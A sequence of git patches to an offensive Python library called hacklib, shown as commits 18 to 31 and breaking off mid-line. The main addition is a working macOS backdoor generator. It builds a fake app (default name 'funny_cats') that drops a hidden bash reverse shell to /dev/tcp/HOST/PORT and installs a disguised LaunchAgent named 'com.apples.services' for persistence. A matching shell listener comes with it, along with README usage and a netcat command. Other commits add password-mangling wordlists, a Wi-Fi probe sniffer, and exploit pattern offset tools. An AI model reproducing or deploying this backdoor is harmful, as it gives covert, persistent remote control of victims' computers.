+445,9 @@ def getProxies(country_filter = 'ALL', proxy_type = ('Socks4', 'Socks5')): proxy_type: Specify whic Socks version to use, e.g. 'Socks5' ''' try: import mechanize - except: raise MissingPackageException('Please install the mechanize module before continuing.') + except: raise MissingPackageException('Please install the mechanize module before continuing. Use hacklib.installDependencies()') try: from bs4 import BeautifulSoup - except: raise MissingPackageException('Please install the beautifulsoup4 module before continuing.') + except: raise MissingPackageException('Please install the beautifulsoup4 module before continuing. Use hacklib.installDependencies()') br = mechanize.Browser() br.set_handle_robots(False) br.addheaders = [('User-agent', 'googlebot')] @@ -478,6 +478,18 @@ def getProxies(country_filter = 'ALL', proxy_type = ('Socks4', 'Socks5')): proxylist = filteredlist return proxylist +def installDependencies(): + import subprocess + try: + mech = subprocess.check_output(['/usr/local/bin/pip', 'install', 'mechanize']) + if 'successfully installed' in mech: print 'Installed mechanize' + beaut = subprocess.check_output(['/usr/local/bin/pip', 'install', 'bs4']) + if 'successfully installed' in beaut: print 'Installed beautifulsoup' + scapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'scapy']) + if 'successfully installed' in beaut: print 'Installed scapy' + except: + raise MissingPipException('Could not find pip.') + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def send(IP, port, message, keepalive = False): '''Creates new socket and sends a TCP message. If keepalive is true, use hacklib.sock @@ -707,3 +719,6 @@ def userInterface(): class MissingPackageException(Exception): '''Raise when 3rd party modules are not able to be imported.''' + +class MissingPipexception(Exception): + '''Raise when pip is not able to be found''' From bc212b0fa3e51eb7216de2f8c9d96cb0e4754457 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Fri, 26 Aug 2016 21:20:36 -0700 Subject: [PATCH 18/40] Update README.md --- README.md | 6 ++++++ 1 file changed, 6 insertions(+) diff --git a/README.md b/README.md index b238d5d..d50b04a 100644 --- a/README.md +++ b/README.md @@ -34,6 +34,12 @@ import hacklib hacklib.userInterface() ``` - +#### Dependencies +Not all classes have external dependencies, but just in case you can do the following: +```python +hacklib.installDependencies() +``` +- #### Usage Examples Multi-threaded Denial of Service (DOS) stress-testing: ```python From 84576f2650f5783a4d7ac65cea29929acfe9df87 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 27 Aug 2016 00:21:58 -0700 Subject: [PATCH 19/40] OSX backdooring --- hacklib.py | 112 ++++++++++++++++++++++++++++++++++++++++++++++++++++- 1 file changed, 110 insertions(+), 2 deletions(-) diff --git a/hacklib.py b/hacklib.py index e14ac50..e21b87f 100644 --- a/hacklib.py +++ b/hacklib.py @@ -21,6 +21,85 @@ import socket, httplib, threading, time, urllib2, os from Queue import Queue +class Backdoor(object): + '''Creates a persistent backdoor payload. Currently only for Mac OSX. + Payloads for Windows and Linux coming soon.''' + + def __init__(self): + self.IP = '' + self.port = '' + self.osx_payload = '''#!/bin/bash +mkdir ~/Library/.h +echo '#!/bin/bash +bash -i >& /dev/tcp/HOST/PORT 0>&1 +wait' > ~/Library/.h/connect.sh +chmod +x ~/Library/.h/connect.sh +echo ' + +Label +com.apples.services +ProgramArguments + +/bin/sh +'$HOME'/Library/.h/connect.sh + +RunAtLoad + +StartInterval +60 +AbandonProcessGroup + + +' > ~/Library/LaunchAgents/com.apples.services.plist +chmod 600 ~/Library/LaunchAgents/com.apples.services.plist +launchctl load ~/Library/LaunchAgents/com.apples.services.plist +exit +''' + + def create(self, IP, port, OS, appname = 'funny_cats'): + '''Creates a user-level reverse shell.''' + + if OS == 'OSX': + self.osx_payload = self.osx_payload.replace('HOST', IP).replace('PORT', str(port)) + try: + os.makedirs(os.getcwd() + '/' + appname + '.app/Contents/MacOS') + except: pass + payload_path = os.getcwd() + '/' + appname + '.app/Contents/MacOS/' + appname + with open(payload_path, 'w') as f: + f.write(self.osx_payload) + import subprocess + subprocess.Popen(['chmod', '755', payload_path]) + print 'Payload saved to ' + os.getcwd() + appname + '.app' + +class Server(object): + + def __init__(self, port): + import socket + self.port = port + self.address = ('localhost', port) + + def listen(self): + import time + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + sock.bind(self.address) + sock.listen(1) + while True: + connection, cAddress = sock.accept() + try: + print 'New connection', cAddress + connection.sendall('whoami\n') + while True: + data = connection.recv(32768) + if data: + print '\n'.join(data.split('\n')[:-1]) + response = raw_input(data.split('\n')[-1]) + data = None + if response: + connection.sendall(response + '\n') + time.sleep(0.5) + finally: + connection.close() + class FTPAuth(object): '''FTP login and command handler. Commands: @@ -644,6 +723,27 @@ def uiLanScan(): print ip print 'Lan scan complete.' time.sleep(2) + +def uiCreateBackdoor(): + print '' + print 'Select OS' + print '1) Mac OSX' + ink = _Getch() + cmd = ink() + if cmd == '1': + ip = raw_input('Listener IP > ') + port = raw_input('Listener Port > ') + appname = raw_input('Filename > ') + bd = Backdoor() + bd.create(ip, port, 'OSX', appname) + time.sleep(2) + +def uiServer(): + print '' + port = raw_input('Listening port > ') + s = Server(int(port)) + print 'Listening on port ' + port + s.listen() def userInterface(): '''Start UI if hacklib isn't being used as a library. @@ -660,10 +760,12 @@ def userInterface(): print '1) Connect to a proxy' print '2) Target an IP or URL' print '3) Lan Scan' - print '4) Exit' + print '4) Create Backdoor' + print '5) Server' + print '6) Exit' ink = _Getch() cmd = ink() - if cmd == '4': + if cmd == '6': return if cmd == '2': address = raw_input('Input IP or URL > ') @@ -686,6 +788,12 @@ def userInterface(): if cmd == '3': uiLanScan() + + if cmd == '4': + uiCreateBackdoor() + + if cmd == '5': + uiServer() if cmd == '1': print 'Would you like to automatically find a proxy or input one manually?' From 4b09fd514cbfbbf6e93a552bf11848cbf5504e85 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 27 Aug 2016 00:34:42 -0700 Subject: [PATCH 20/40] Backdooring info --- README.md | 24 ++++++++++++++++++++---- 1 file changed, 20 insertions(+), 4 deletions(-) diff --git a/README.md b/README.md index d50b04a..e7f8cff 100644 --- a/README.md +++ b/README.md @@ -41,13 +41,29 @@ hacklib.installDependencies() ``` - #### Usage Examples -Multi-threaded Denial of Service (DOS) stress-testing: +Reverse shell backdooring (Currently only for Macs): ```python import hacklib -dos = hacklib.DOSer() -# Create 50 threads to send GET requests for 30 seconds -dos.launch('127.0.0.1', duration=30, threads=50) +bd = hacklib.Backdoor() +# Generates an app that drops a persistent reverse shell into the system. +bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures') +# Takes the IP and port of the command server, the OS of the target, and the name of the .app +``` +- + +Shell listener (Use in conjunction with the backdoor): +```python +import hacklib +# Create instance of Server with the listening port +>>> s = hacklib.Server(9090) +>>> s.listen() +New connection ('127.0.0.1', 51101) +bash: no job control in this shell +bash-3.2$ whoami +leon +bash-3.2$ +# Sweet! ``` - Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins: From 1aaf1a40ac4348669fec71bf317d0372af9a5f0d Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 27 Aug 2016 00:35:32 -0700 Subject: [PATCH 21/40] backdooring bug fixes --- hacklib.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hacklib.py b/hacklib.py index e21b87f..ff50cb2 100644 --- a/hacklib.py +++ b/hacklib.py @@ -69,7 +69,7 @@ def create(self, IP, port, OS, appname = 'funny_cats'): f.write(self.osx_payload) import subprocess subprocess.Popen(['chmod', '755', payload_path]) - print 'Payload saved to ' + os.getcwd() + appname + '.app' + print 'Payload saved to ' + os.getcwd() + '/' + appname + '.app' class Server(object): From 30635c9f208122195cc47632afdbdb63de4e8835 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 27 Aug 2016 01:04:28 -0700 Subject: [PATCH 22/40] server bug fix --- hacklib.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hacklib.py b/hacklib.py index ff50cb2..2dbc7ab 100644 --- a/hacklib.py +++ b/hacklib.py @@ -76,7 +76,7 @@ class Server(object): def __init__(self, port): import socket self.port = port - self.address = ('localhost', port) + self.address = ('', port) def listen(self): import time From 1cef96428c4d4c805a13b3cb92af6ebe5830444a Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 27 Aug 2016 01:29:55 -0700 Subject: [PATCH 23/40] server bug fixes --- hacklib.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/hacklib.py b/hacklib.py index 2dbc7ab..646f09d 100644 --- a/hacklib.py +++ b/hacklib.py @@ -76,7 +76,7 @@ class Server(object): def __init__(self, port): import socket self.port = port - self.address = ('', port) + self.address = (socket.gethostname(), port) def listen(self): import time From 5256822f35ca2fe317ce222e69e052e52fdf834c Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 27 Aug 2016 01:56:17 -0700 Subject: [PATCH 24/40] Update README.md --- README.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/README.md b/README.md index e7f8cff..d43a1c3 100644 --- a/README.md +++ b/README.md @@ -65,6 +65,10 @@ leon bash-3.2$ # Sweet! ``` +In addition, you can also listen with netcat: +``` +nc -l 9090 +``` - Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins: From 23c1f8d7ec832dedcf9580d4e5ecb80e93bd7682 Mon Sep 17 00:00:00 2001 From: "Tyler Price (CPT)" Date: Sat, 27 Aug 2016 21:12:40 -0400 Subject: [PATCH 25/40] Added PatternCreate and PatternOffset --- hacklib.py | 323 +++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 323 insertions(+) diff --git a/hacklib.py b/hacklib.py index 1dea7c0..df9208f 100644 --- a/hacklib.py +++ b/hacklib.py @@ -20,6 +20,10 @@ import socket, httplib, threading, time, urllib2, os from Queue import Queue +import logging +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error +from scapy.all import * # Required for the Probe Request Class +from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset class FTPAuth(object): '''FTP login and command handler. @@ -701,6 +705,325 @@ def userInterface(): print 'Proxy connected.' time.sleep(2) pass +""" + +This Class Mangles Words specified by the user + +Example: + +Test = hacklib.Mangle("Test", 1, 10, 1996, 2016) + +Test.Leet() + +Output: T3st + +""" + +class Mangle: + + def __init__(self, text, num1, num2, year1, year2): + + self.num1 = num1 + self.num2 = num2 + self.year1 = year1 + self.year2 = year2 + self.text = text + + + def Numbers(self): + + for x in self.text.split(): + + for i in range(self.num1, self.num2): + + print ("%s" + "%s") % (x, i) + print ("%s" + "%s") % (i, x) + + def Years(self): + + for x in self.text.split(): + + for i in range(self.year1, self.year2): + + print ("%s" + "%s") % (x, i) + print ("%s" + "%s") % (i, x) + + + def UniqueNum(self): + + for x in self.text.split(): + + for i in range(self.num1, self.num2): + + print ("%s" + "%s" + "%s") % (x, x, i) + + + def UniqueYears(self): + + for x in self.text.split(): + + for i in range(self.year1, self.year2): + + print ("%s" + "%s" + "%s") % (x, x, i) + + + + def FirstLetterCapNum(self): + + for x in self.text.split(): + + for i in range(self.num1, self.num2): + + print ("%s" + "%s") % (x.capitalize(), i) + print ("%s" + "%s") % (i, x.capitalize()) + + def Caps(self): + + for x in self.text.split(): + + print x.capitalize() + + + def UniqueCaps(self): + + for x in self.text.split(): + + print ("%s" + "s") % (x.capitalize(), x.capitalize()) + + + + def CapandYears(self): + + for x in self.text.split(): + + for i in range(self.year1, self.year2): + + print ("%s" + "%s") % (x.capitalize(), i) + print ("%s" + "%s") % (i, x.capitalize()) + + + def Leet(self): + + for x in self.text.split(): + print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") + + + + def LeetCap(self): + + for x in self.text.split(): + print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") + + + + def LeetYears(self): + + for x in self.text.split(): + + for i in range(self.year1, self.year2): + + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) + print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) + + + def LeetNumbers(self): + + for x in self.text.split(): + + for i in range(self.num1, self.num2): + + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) + print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) + + + def UniqueLeet(self): + + for x in self.text.split(): + + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"),(x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))) + + + + def Reverse(self): + + for x in self.text.split(): + + print x[::-1] + + + def ReverseCap(self): + + for x in self.text.split(): + print x[::-1].capitalize() + + + + def ReverseNum(self): + + for x in self.text.split(): + + for i in range(self.num1, self.num2): + + print ("%s" + "%s") % (x[::-1], i) + print ("%s" + "%s") % (i, x[::-1]) + + + + def ReverseYears(self): + + for x in self.text.split(): + + for i in range(self.year1, self.year2): + + print ("%s" + "%s") % (x[::-1], i) + print ("%s" + "%s") % (i, x[::-1]) + + + def ReverseUnique(self): + + for x in self.text.split(): + + print x[::-1] + x[::-1] + +''' +This Classes Dectects Probe Requests from Wireless Devices. + +Example: + +Probe = Proberequests("wlan0") + +Probe.startSniff() + +''' + +class Proberequests: + + global probeReqs + + probeReqs = [] + + def __init__(self, interface): + + self.interface = interface + + def sniffProbe(self, p): + + if p.haslayer(Dot11ProbeReq): + netName = p.getlayer(Dot11ProbeReq).info + if netName not in probeReqs: + probeReqs.append(netName) + print '[!] Detected New Probe Request: ' + print "[+] ESSID: " + netName + " BSSID: " + p.addr2 + + def startSniff(self): + + print "[+] Scanning...\n" + + sniff(iface=self.interface, prn=self.sniffProbe) + +""" + +This class creates a unique pattern of 20280 characters. + +This is a replica of the metasploit tool called pattern_create.rb + +Example: + +patternTest = PatternCreate(1000) + +patternTest.generate() + +Creates a unique pattern of 1000 characters. + +""" + +class PatternCreate: + + global MAX_PATTERN_LENGTH + + MAX_PATTERN_LENGTH = 20280 + + def __init__(self, length): + + self.length = length + + def generate(self): + + output = [] + + """ + Generate a pattern of a given length up to a maximum + of 20280 - after this the pattern would repeat + """ + if self.length >= MAX_PATTERN_LENGTH: + raise MaxLengthException('ERROR: Pattern length exceeds maximum of %d' % MAX_PATTERN_LENGTH) + + pattern = '' + for upper in ascii_uppercase: + for lower in ascii_lowercase: + for digit in digits: + if len(pattern) < self.length: + pattern += upper+lower+digit + else: + out = pattern[:self.length] + + output.append(out) + + print str(output)[1:-1].replace("'", "") + + +""" + +This class finds the offset from the PatternCreate class. + +This is a replica of the metasploit tool called pattern_offset.rb + +Example: + +offset = PatternOffset("Aw1A") + +offset.find() + +Finds offset of Aw1A. + +Output: [+] Offset: 663 + +""" + + +class PatternOffset: + + def __init__(self, search_pattern): + + self.search_pattern = search_pattern + + def find(self): + + offset = [] + + needle = self.search_pattern + + try: + if needle.startswith('0x'): + # Strip off '0x', convert to ASCII and reverse + needle = needle[2:] + needle = bytes.fromhex(needle).decode('ascii') + needle = needle[::-1] + except TypeError as e: + print('Unable to convert hex input:', e) + sys.exit(1) + + haystack = '' + for upper in ascii_uppercase: + for lower in ascii_lowercase: + for digit in digits: + haystack += upper+lower+digit + found_at = haystack.find(needle) + if found_at > -1: + + offset = found_at + + print "[+] Offset: " + str(offset) if __name__ == '__main__': userInterface() From 22b568a675941edb0af74a7a192deec25db70cc3 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Sat, 27 Aug 2016 19:36:16 -0700 Subject: [PATCH 26/40] handle scapy dependency issues --- hacklib.py | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/hacklib.py b/hacklib.py index ebc630f..59157ea 100644 --- a/hacklib.py +++ b/hacklib.py @@ -20,9 +20,10 @@ import socket, httplib, threading, time, urllib2, os from Queue import Queue +try: from scapy.all import * +except: raise MissingPackageException('Please install scapy to continue.') import logging logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error -from scapy.all import * # Required for the Probe Request Class from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset class Backdoor(object): @@ -563,15 +564,14 @@ def getProxies(country_filter = 'ALL', proxy_type = ('Socks4', 'Socks5')): def installDependencies(): import subprocess - try: - mech = subprocess.check_output(['/usr/local/bin/pip', 'install', 'mechanize']) - if 'successfully installed' in mech: print 'Installed mechanize' - beaut = subprocess.check_output(['/usr/local/bin/pip', 'install', 'bs4']) - if 'successfully installed' in beaut: print 'Installed beautifulsoup' - scapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'scapy']) - if 'successfully installed' in beaut: print 'Installed scapy' - except: - raise MissingPipException('Could not find pip.') + mech = subprocess.check_output(['/usr/local/bin/pip', 'install', 'mechanize']) + if 'successfully installed' in mech: print 'Installed mechanize' + beaut = subprocess.check_output(['/usr/local/bin/pip', 'install', 'bs4']) + if 'successfully installed' in beaut: print 'Installed beautifulsoup' + scapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'scapy']) + if 'successfully installed' in scapy: print 'Installed scapy' + pcapy = subprocess.check_output(['/usr/local/bin/pip', 'install', 'pcapy']) + if 'successfully installed' in pcapy: print 'Installed pcapy' sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) def send(IP, port, message, keepalive = False): @@ -1110,10 +1110,11 @@ def generate(self): """ - class PatternOffset: def __init__(self, search_pattern): + + self.search_pattern = search_pattern From 390e5ebc8d04c6152cbce76da6e60944551526d2 Mon Sep 17 00:00:00 2001 From: "Tyler Price (CPT)" Date: Sat, 27 Aug 2016 22:58:55 -0400 Subject: [PATCH 27/40] Update hacklib.py --- hacklib.py | 27 ++++++++++++++------------- 1 file changed, 14 insertions(+), 13 deletions(-) diff --git a/hacklib.py b/hacklib.py index 59157ea..382e163 100644 --- a/hacklib.py +++ b/hacklib.py @@ -19,11 +19,11 @@ OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' import socket, httplib, threading, time, urllib2, os +import logging from Queue import Queue +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error try: from scapy.all import * except: raise MissingPackageException('Please install scapy to continue.') -import logging -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset class Backdoor(object): @@ -843,10 +843,10 @@ class Mangle: def __init__(self, text, num1, num2, year1, year2): - self.num1 = num1 - self.num2 = num2 - self.year1 = year1 - self.year2 = year2 + self.num1 = num1 + self.num2 = num2 + 1 + self.year1 = year1 + self.year2 = year2 + 1 self.text = text @@ -925,14 +925,14 @@ def CapandYears(self): def Leet(self): for x in self.text.split(): - print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") + print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$") def LeetCap(self): for x in self.text.split(): - print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") + print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$") @@ -942,8 +942,8 @@ def LeetYears(self): for i in range(self.year1, self.year2): - print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) - print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$"), i) + print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$")) def LeetNumbers(self): @@ -952,15 +952,15 @@ def LeetNumbers(self): for i in range(self.num1, self.num2): - print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"), i) - print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8")) + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$"), i) + print ("%s" + "%s") % (i, x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$")) def UniqueLeet(self): for x in self.text.split(): - print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"),(x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"))) + print ("%s" + "%s") % (x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8"),(x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$"))) @@ -1005,6 +1005,7 @@ def ReverseUnique(self): print x[::-1] + x[::-1] + ''' This Classes Dectects Probe Requests from Wireless Devices. From 19bbe72b100306207c3479e3b4f69b6932493876 Mon Sep 17 00:00:00 2001 From: "Tyler Price (CPT)" Date: Sat, 27 Aug 2016 23:18:35 -0400 Subject: [PATCH 28/40] Update README.md --- README.md | 59 +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 59 insertions(+) diff --git a/README.md b/README.md index d43a1c3..3b94210 100644 --- a/README.md +++ b/README.md @@ -176,3 +176,62 @@ u'KE' # To filter proxies by country and type: # proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5') ``` +- +Word Mangling: + +```python +from hacklib import * + +word = Mangle("Test", 0, 10, 1990, 2016) + +word.Leet() +word.Numbers() +word.Years() +``` +Output: + +```python +T3$t +Test0 +0Test +...snip... +Test10 +10Test +Test1990 +1990Test +...snip... +Test2016 +2016Test +``` +- + +Pattern Create: + +```python +from hacklib import * + +Pattern = PatternCreate(100) + +Pattern.generate() +``` +Output: + +``` +Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A +``` +- + +Pattern Offset: + +```python +from hacklib import * + +Offset = PatternOffset("6Ab7") + +Offset.find() +``` +Output: + +```python +[+] Offset: 50 +``` From 6dc4b644047e83088d37a4000808f2bf5520cc64 Mon Sep 17 00:00:00 2001 From: "Tyler Price (CPT)" Date: Sat, 27 Aug 2016 23:19:27 -0400 Subject: [PATCH 29/40] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 3b94210..4987fee 100644 --- a/README.md +++ b/README.md @@ -190,7 +190,7 @@ word.Years() ``` Output: -```python +``` T3$t Test0 0Test From c2e7df9eaa19adcc3e072df686ff1616e875ea9b Mon Sep 17 00:00:00 2001 From: Leon Li Date: Tue, 30 Aug 2016 12:13:19 -0700 Subject: [PATCH 30/40] Server still sketchy --- README.md | 16 +--------------- 1 file changed, 1 insertion(+), 15 deletions(-) diff --git a/README.md b/README.md index 4987fee..35c2f3e 100644 --- a/README.md +++ b/README.md @@ -50,22 +50,8 @@ bd = hacklib.Backdoor() bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures') # Takes the IP and port of the command server, the OS of the target, and the name of the .app ``` -- -Shell listener (Use in conjunction with the backdoor): -```python -import hacklib -# Create instance of Server with the listening port ->>> s = hacklib.Server(9090) ->>> s.listen() -New connection ('127.0.0.1', 51101) -bash: no job control in this shell -bash-3.2$ whoami -leon -bash-3.2$ -# Sweet! -``` -In addition, you can also listen with netcat: +Listen for connections with netcat: ``` nc -l 9090 ``` From 34ce368d73e35f8319042060709646057678cef7 Mon Sep 17 00:00:00 2001 From: Leon Li Date: Thu, 29 Sep 2016 19:49:45 -0700 Subject: [PATCH 31/40] Server fix --- hacklib.py | 41 ++++++++++++++++++++--------------------- 1 file changed, 20 insertions(+), 21 deletions(-) diff --git a/hacklib.py b/hacklib.py index 382e163..62cb7cc 100644 --- a/hacklib.py +++ b/hacklib.py @@ -19,15 +19,16 @@ OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.''' import socket, httplib, threading, time, urllib2, os -import logging from Queue import Queue -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error -try: from scapy.all import * -except: raise MissingPackageException('Please install scapy to continue.') +try: # Import scapy if they have it. If they don't, they can still use hacklib + from scapy.all import * + import logging + logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Fixes scapy logging error +except: pass from string import ascii_uppercase, ascii_lowercase, digits # Import for PatternCreate and PatternOffset class Backdoor(object): - '''Creates a persistent backdoor payload. Currently only for Mac OSX. + '''Creates an app carrying a persistent backdoor payload. Currently only for Mac OSX. Payloads for Windows and Linux coming soon.''' def __init__(self): @@ -81,7 +82,7 @@ class Server(object): def __init__(self, port): import socket self.port = port - self.address = (socket.gethostname(), port) + self.address = ('', port) def listen(self): import time @@ -92,12 +93,11 @@ def listen(self): connection, cAddress = sock.accept() try: print 'New connection', cAddress - connection.sendall('whoami\n') while True: data = connection.recv(32768) if data: print '\n'.join(data.split('\n')[:-1]) - response = raw_input(data.split('\n')[-1]) + response = raw_input('bash$ ') data = None if response: connection.sendall(response + '\n') @@ -616,7 +616,7 @@ def uiPortScan(address): if cmd == '2': s_port = raw_input('Input starting port > ') e_port = raw_input('Input end port >') - ps.scan(address, (s_port, e_port)) + ps.scan(address, (int(s_port), int(e_port))) print 'Port scan complete.' def uiDOS(address): @@ -843,10 +843,10 @@ class Mangle: def __init__(self, text, num1, num2, year1, year2): - self.num1 = num1 - self.num2 = num2 + 1 - self.year1 = year1 - self.year2 = year2 + 1 + self.num1 = num1 + self.num2 = num2 + self.year1 = year1 + self.year2 = year2 self.text = text @@ -925,14 +925,14 @@ def CapandYears(self): def Leet(self): for x in self.text.split(): - print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$") + print x.replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") def LeetCap(self): for x in self.text.split(): - print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8").replace("s", "$").replace("S", "$") + print x.capitalize().replace("e", "3").replace("i", "1").replace("O", "0").replace("I", "1").replace("E", "3").replace("o", "0").replace("l", "1").replace("L", "1").replace("g", "9").replace("G", "6").replace("b", "8").replace("B", "8") @@ -942,8 +942,8 @@ def LeetYears(self): for i in range(self.year1, self.year2): - print 